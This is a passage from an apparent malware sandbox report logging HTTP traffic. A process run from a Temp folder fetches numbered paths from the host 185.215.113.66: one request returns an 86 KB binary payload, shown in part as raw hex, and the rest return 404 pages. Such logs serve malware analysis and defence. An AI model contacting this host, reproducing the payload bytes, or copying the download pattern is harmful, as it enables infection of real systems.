                                                                        Data Ascii: hi|-XGjIaDRr9YU/R2]\dw[6W>w{TQKPJfD:R=u`4nf_t0H[(=m(!Y)Sj0)PR*.FBoLjlGtnNa)9Q_nS4<0ql1('^qzw^ ?}k3KJS<
                                                                        Apr 24, 2024 10:07:12.240544081 CEST1289INData Raw: f2 7d da 93 7a 3a 14 25 2b 44 e3 ab 9b 5a 60 0c ae e0 95 34 a7 43 92 15 80 58 9c 5d ac cf 08 bd b6 75 fb 90 62 4c 39 23 dc 8d f5 44 f2 bd dc 65 c1 d8 1b 97 41 c9 76 8c bf f0 a2 c0 e2 58 d9 2e 5f 8f 50 91 46 17 88 27 54 c2 c0 99 de db cb 81 fd 2b
                                                                        Data Ascii: }z:%+DZ`4CX]ubL9#DeAvX._PF'T+gW+Sfs7AOL#.#Z,*#Y6)i%[){#G2/DrWyXTTS_a21zs{DOVX]e){J}Rx}{a]*!qk%wDv
                                                                        Apr 24, 2024 10:07:12.240595102 CEST1289INData Raw: ce 1e ad 79 cb c8 53 17 44 a1 fb 59 e4 97 27 7c 4d f1 ee 2e 3f 59 6d 99 27 99 ae 80 74 c9 a1 5e db 58 83 4a d9 f7 c4 43 b2 53 12 d9 ca 23 56 87 1f 61 99 51 97 21 4a fb f1 fe 44 5b 59 6e 44 7a 5d a0 69 d3 99 4b 80 48 a6 cc 67 45 82 d8 79 6a 2f 29
                                                                        Data Ascii: ySDY'|M.?Ym't^XJCS#VaQ!JD[YnDz]iKHgEyj/)$FowfW_x"#UU4Ca/H:!]2?3khpQY9bw^S`y6oPFh&iQNm%&gw>>GD`b
                                                                        Apr 24, 2024 10:07:12.240659952 CEST1289INData Raw: b8 1a ef 7a 58 1e 2a 5a f0 ca a0 98 f4 93 fa 72 45 df 40 f4 39 37 e1 f9 0d 4d 2c e2 a7 80 52 67 ff 64 a0 6e cb f7 15 17 66 a9 48 a3 58 85 7c 8e 14 64 16 ef d3 0e fc 99 ed f1 18 a7 67 41 ac 1e 1f 8f 7d 33 8f 5e e2 ba a4 98 30 4a 97 b6 3f 2b 69 2d
                                                                        Data Ascii: zX*ZrE@97M,RgdnfHX|dgA}3^0J?+i-${*2|w'yc|]Agx07MW&<$-+WEd4$ySsh7o%X*D FQA5${`?+L9m|'D^
                                                                        Apr 24, 2024 10:07:12.241719007 CEST1289INData Raw: 75 5c 5e a0 0b 76 65 93 a0 62 d6 54 b0 02 66 24 b4 8d 51 47 5e 14 01 6e fb 0d 22 05 69 69 05 41 6a 9a d6 7b a2 25 a8 b4 03 44 fc f6 0b 97 87 1f 32 f3 e3 e9 7a e4 b1 f5 00 a9 0d fe 64 a3 f9 bc 8e 83 ea b9 b7 09 87 3c 51 35 b9 6b ad eb 85 d5 24 b5
                                                                        Data Ascii: u\^vebTf$QG^n"iiAj{%D2zd<Q5k$h!\'0'#ORZo3.,U`9k,zh@NJv:>T<7!QazBdV(>Pg??qL2?Rr)\'[LYM`$
                                                                        Apr 24, 2024 10:07:12.241787910 CEST1289INData Raw: a5 d8 15 2a 35 55 70 8c 74 ac 02 e6 0b c7 b2 65 ec 18 44 cc a0 61 15 44 ab c5 a7 92 a5 c9 e5 73 5c 0a e1 72 bd 6a 4f 72 b8 57 56 47 bf 55 10 96 ba 13 54 e1 d4 0a 19 50 3e 36 02 58 83 4f 97 d7 ce 0c 9c 61 47 53 85 df f9 19 3c d8 cc 9a 11 f5 ce c9
                                                                        Data Ascii: *5UpteDaDs\rjOrWVGUTP>6XOaGS<S)QGKv3A?)R,YrZBmd.6=\,{'ut|.G%umnnfE~dT=D-%7}=]V#+W$Bh
                                                                        Apr 24, 2024 10:07:12.577148914 CEST1289INData Raw: dc b2 d8 2f 48 af 15 31 37 75 9b 82 b2 90 3a 8b 99 d6 d0 f7 73 0f 16 fa 34 16 42 6b ba 11 83 7a 5a af 85 2b ba 2f 96 f6 9a 44 06 89 df 25 19 4b b7 62 2e 01 67 be b2 1e ae b4 99 71 f0 2c 33 6e e9 78 d2 39 3e b3 b1 d8 c6 38 47 81 bc 09 26 9c b5 2a
                                                                        Data Ascii: /H17u:s4BkzZ+/D%Kb.gq,3nx9>8G&*?~SDrd g&YF41zFI>lWgy.mfmd&pC?t/VazmMQrI;\BEj[zm}/1M>H%
                                                                        Apr 24, 2024 10:07:19.066494942 CEST166OUTGET /2 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                        Host: 185.215.113.66
                                                                        Apr 24, 2024 10:07:19.403055906 CEST728INHTTP/1.1 404 Not Found
                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                        Date: Wed, 24 Apr 2024 08:07:19 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 564
                                                                        Connection: keep-alive
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                        Apr 24, 2024 10:07:21.425288916 CEST166OUTGET /3 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                        Host: 185.215.113.66
                                                                        Apr 24, 2024 10:07:21.762011051 CEST728INHTTP/1.1 404 Not Found
                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                        Date: Wed, 24 Apr 2024 08:07:21 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 564
                                                                        Connection: keep-alive
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                        Apr 24, 2024 10:07:23.785530090 CEST166OUTGET /4 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                        Host: 185.215.113.66
                                                                        Apr 24, 2024 10:07:24.122106075 CEST728INHTTP/1.1 404 Not Found
                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                        Date: Wed, 24 Apr 2024 08:07:23 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 564
                                                                        Connection: keep-alive
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                        Apr 24, 2024 10:07:26.144078016 CEST166OUTGET /5 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                        Host: 185.215.113.66
                                                                        Apr 24, 2024 10:07:26.483851910 CEST728INHTTP/1.1 404 Not Found
                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                        Date: Wed, 24 Apr 2024 08:07:26 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 564
                                                                        Connection: keep-alive
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                        Apr 24, 2024 10:07:28.788214922 CEST166OUTGET /6 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                        Host: 185.215.113.66
                                                                        Apr 24, 2024 10:07:29.124979019 CEST728INHTTP/1.1 404 Not Found
                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                        Date: Wed, 24 Apr 2024 08:07:28 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 564
                                                                        Connection: keep-alive
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.649743185.215.113.66806684C:\Users\user\AppData\Local\Temp\135143440.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Apr 24, 2024 10:08:45.750771046 CEST166OUTGET /1 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                        Host: 185.215.113.66
                                                                        Apr 24, 2024 10:08:46.113019943 CEST1289INHTTP/1.1 200 OK
                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                        Date: Wed, 24 Apr 2024 08:08:45 GMT
                                                                        Content-Type: application/octet-stream
                                                                        Content-Length: 86272
                                                                        Last-Modified: Tue, 23 Apr 2024 21:15:20 GMT
                                                                        Connection: keep-alive
                                                                        ETag: "662824e8-15100"
                                                                        Accept-Ranges: bytes
                                                                        Data Raw: a8 4a f5 c3 4d 1e 89 ed 25 ad 4f 3b 68 ed 08 ba 62 02 f5 3e e5 71 7c d2 8a 81 92 a8 64 31 86 38 dc e1 cd 87 12 04 19 ea d1 c9 79 a1 00 a8 7a b6 06 d8 d2 d1 ad 21 c1 69 e6 d6 73 7e b2 94 f7 80 9f 96 01 92 0f 8b 13 23 cc ff 38 49 0f 77 72 a8 da 4b 60 7b d1 04 ee ff a5 bd 8e cf 56 23 15 db 17 a4 73 e1 bd 8f fe f3 80 6b ec 3f ea d0 f3 21 3e fb 3a e6 f4 0d 0f f0 0c ce 5b c5 d1 c7 9d 08 74 55 7a 82 54 f5 5d 3c b7 18 6e 69 67 6b 3f 75 a1 18 db 21 dd 6a 9a ea b7 d9 50 cc e4 e7 e5 22 d3 3c 53 a6 42 90 c9 d5 08 4e 78 44 15 b0 d8 bf 11 7c 56 cd 0f a1 28 44 ae 62 96 bf f4 fc ef 16 f3 bd b7 1d 44 de c3 a1 21 23 23 fc 67 9c ac 93 34 43 5f 0f 8f b2 fd f7 8c 65 bd 2f 15 e0 fd 81 71 50 7a 3d 53 81 55 c5 77 d6 a0 07 8f 42 a2 b4 18 8a 33 af 44 b2 6b 07 89 00 c0 1c cc ce 53 b0 0f 52 ce f7 63 3f c2 db 1b fc b1 d5 3d 1d 42 1c 82 ac 44 97 03 1c 77 0d 6b 9c b0 2f bb cf ed b5 4c 09 e1 72 99 31 95 9c 7b 73 b7 0a c2 b5 10 b2 4a 9f 67 95 1e e8 81 48 04 52 34 8c 59 e3 30 58 90 ca 24 69 0c b0 4a 33 a0 0c c1 76 c4 90 62 96 1d 8a 1e 09 f9 39 be dc 6d c2 97 a0 77 10 d2 08 01 b2 62 6f be e1 f6 f7 1f a7 65 08 ad 7a 6e bf cd b2 fb 55 9c 62 87 56 eb 2c 61 60 52 08 3a 90 e5 37 02 40 df 6f 74 b3 3b bf 2a e7 47 7a 74 5f 4c b1 f5 ec 9b 7f 43 73 a2 6b ed e6 be e8 c7 6a 4a ea cf 80 8e 68 e3 ff a5 3b 6e d6 29 91 f5 5d e6 48 22 3e c5 72 37 58 b6 4a 03 0c 3f 19 0a d4 79 9e fc 81 35 ce ca 88 5a 9f 27 e0 e2 87 d5 86 4a 4b c9 f4 20 64 dc e4 d5 26 65 eb 09 43 ae a1 26 ec 1a b5 a1 2f db 92 db ee 1c 5a ba 98 65 7e e7 87 da e2 b0 fc e3 90 8b 2c 39 51 9a f3 9e 48 3d 38 9c b6 45 62 0c 6a 63 8e fb 6d df 94 67 86 41 9f 01 54 7b a5 e6 2b d8 7a f1 84 fc 52 c2 33 fd 9c 1d 5a 35 12 6f 9e 42 90 ee 6c a9 0a 2b 43 05 ae a5 bb 4b f7 c6 10 f8 1b 37 57 de 22 ff d5 43 f1 bf eb 24 89 f0 17 6f b2 5f aa 96 b8 a8 69 58 64 cb ac f8 30 91 64 77 39 e7 de fc 05 aa 44 59 3e 23 09 75 9e a2 d2 05 bc 6e 50 e8 72 f6 ee ae 96 0d d8 21 15 51 57 d7 df 22 90 98 d1 4a 32 f6 ff 63 3d dd dc e6 71 7e ab 94 c2 21 7e 76 8a b6 d2 0a 70 9e b0 76 68 4c b0 9c 49 21 9a f3 c5 5f 68 ba e4 b9 a2 2f b5 9f 54 7f 47 fb d0 64 43 66 56 67 81 dd dd 7e 90 2f d5 1a 77 29 0a bd a7 43 5f 38 04 21 58 d6 38 2b 7b 48 40 77 7f 81 86 0f 4a a6 83 bc 73 f8 48 24 1c 42 38 79 9e b9 e1 6c a4 35 66 12 19 54 21 97 7e af 92 02 71 4d 92 62 d4 20 7c 41 f7 b5 62 0c c3 6f b6 fa 9f b3 83 d5 06 c5 df 10 f0 cc 69 18 f0 b1 fc 92 10 40 b8 ca 52 18 e5 1f e4 b1 43 35 fd 31 b0 34 46 98 7b 9b f3 02 05 33 df 66 6e 70 0b 66 0e ed 05 2e 2c 4f 1f 2f a6 89 f2 b1 c4 aa 28 18 75 70 75 2e 03 36 f2 17 cc cd 16 ec 50 6d ee f4 46 74 4f 65 34 be 40 69 91 ed 34 15 69 4d b9 56 4d fd 08 22 4a 9c b2 13 df c8 60 77 fe 51 b1 e0 0d 0d ca 89 8a 4c 73 dc 94 de 64 ce e7 aa 64 99 48 a5 4f 32 22 c6 7a 17 43 d9 bf 6d a7 d6 68 37 17 29 68 e5 2c 8f 88 1c 9b 7a 15 f2 ef 73 92 a5 35 d3 d1 c3 98 34 d6 1b a7 3a db 5a 1e 98 f0 e3 d6 d9 2a fd b6 f0 ba ca 8f c6 b0 ef 11 21 b0 55 03 12 ac 32 b1 84 3b 7d 09 60 0a b7 c4 e6 14 a2 90 f8 49 88 b3 79 d3 8a f0 0a c9 91 32 af 8d c9 26 fb 60 d1 68 5b d8 98 07 fc 19 7e 57 86 31 b5 04 7a fd 5b b3 ac 1e 62 62 16 37 88 e5 10 ad ba 6f 9c 98 78
                                                                        Data Ascii: JM%O;hb>q|d18yz!is~#8IwrK`{V#sk?!>:[tUzT]<nigk?u!jP"<SBNxD|V(DbD!##g4C_e/qPz=SUwB3DkSRc?=BDwk/Lr1{sJgHR4Y0X$iJ3vb9mwboeznUbV,a`R:7@ot;*Gzt_LCskjJh;n)]H">r7XJ?y5Z'JK d&eC&/Ze~,9QH=8EbjcmgAT{+zR3Z5oBl+CK7W"C$o_iXd0dw9DY>#unPr!QW"J2c=q~!~vpvhLI!_h/TGdCfVg~/w)C_8!X8+{H@wJsH$B8yl5fT!~qMb |Aboi@RC514F{3fnpf.,O/(upu.6PmFtOe4@i4iMVM"J`wQLsddHO2"zCmh7)h,zs54:Z*!U2;}`Iy2&`h[~W1z[bb7ox
                                                                        Apr 24, 2024 10:08:46.113060951 CEST1289INData Raw: d5 7b 0b 1e 78 9c ea 64 cd 53 48 60 6d 26 78 ad f2 45 08 0c c6 c5 b8 64 c4 4c 5a fe 02 ca 39 88 20 33 ab 45 a2 8c 64 bc 8d b6 05 f6 9d a5 58 39 54 37 1b 66 49 1e 3c 68 64 9f ec f2 5e eb f7 67 f5 3f 90 61 00 12 cf 6c 4b ac b9 ae 8e a0 55 83 e6 df
